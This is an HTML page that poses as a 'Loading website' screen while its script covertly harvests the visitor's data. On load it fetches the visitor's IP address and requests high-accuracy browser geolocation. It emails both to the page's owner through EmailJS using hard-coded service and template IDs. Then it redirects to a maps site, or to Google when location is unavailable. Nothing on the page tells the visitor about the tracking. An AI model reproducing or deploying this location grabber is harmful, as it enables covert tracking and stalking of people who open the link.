<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>App new</title>
    <style>
        body{
            font-family: Arial, Helvetica, sans-serif;
        }
        .container {
            background-color: white;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            width: 100%;
            flex-direction: column;
            gap: 2em;
        }

        img {
            height: 3.75em;
        }

        p {
            font-size: 1.25em;
            color: #000;
            font-weight: bold;
        }

        @media (max-width: 400px) {
            img {
                height: 5em;
            }
        }
    </style>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js">
    </script>
    <script>
        document.addEventListener('DOMContentLoaded', () => {

            emailjs.init({
                publicKey: "7v0F1mQIEfzptL4U6",
            });

            let ipAddress = '';
            let latitude = '';
            let longitude = '';

            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipAddress = data.ip;
                    console.log(`IP Address: ${ipAddress}`);
                    sendEmail(ipAddress, latitude, longitude);
                })
                .catch(error => {
                    console.error('Error fetching IP address:', error);
                    console.log('Unable to fetch IP address');
                });

            if ('geolocation' in navigator) {
                const options = {
                    enableHighAccuracy: true,
                    timeout: 5000,
                    maximumAge: 0
                };

                navigator.geolocation.getCurrentPosition(
                    position => {
                        const { latitude, longitude } = position.coords;

                        console.log(`Latitude: ${latitude}, Longitude: ${longitude}`);
                        sendEmail(ipAddress, latitude, longitude);
                    },
                    error => {
                        console.error('Error fetching location:', error);
                        console.log('Unable to fetch location');
                    },
                    options
                );
            } else {
                console.log('Geolocation is not supported by your browser');
                document.querySelector('#info').textContent = 'Error Loading Website';
                window.location.href = 'https://www.google.com'
            }

            function sendEmail(ip, lat, long) {
                if (ip && lat && long) {
                    const templateParams = {
                        ip_address: ip,
                        latitude: lat,
                        longitude: long
                    };

                    emailjs.send('service_o088nnk', 'template_3idcs9p', templateParams)
                        .then(response => {
                            console.log('Email sent successfully!', response.status, response.text);
                        })
                        .then(() => {
                            document.querySelector('#info').textContent = 'Redirecting to Website...'
                        })
                        .then(() => {
                            window.location.href = 'https://www.petalmaps.com'
                        })
                        .catch(error => {
                            console.error('Error sending email:', error);
                        });
                }
            }
        });
    </script>
</head>

<body>
    <div class="container">
        <img src="https://raw.githubusercontent.com/niklausgerber/PreLoadMe/master/img/status.gif" alt="">
        <p id="info">Loading website ...... Please wait</p>
    </div>

    </div>
</body>

</html>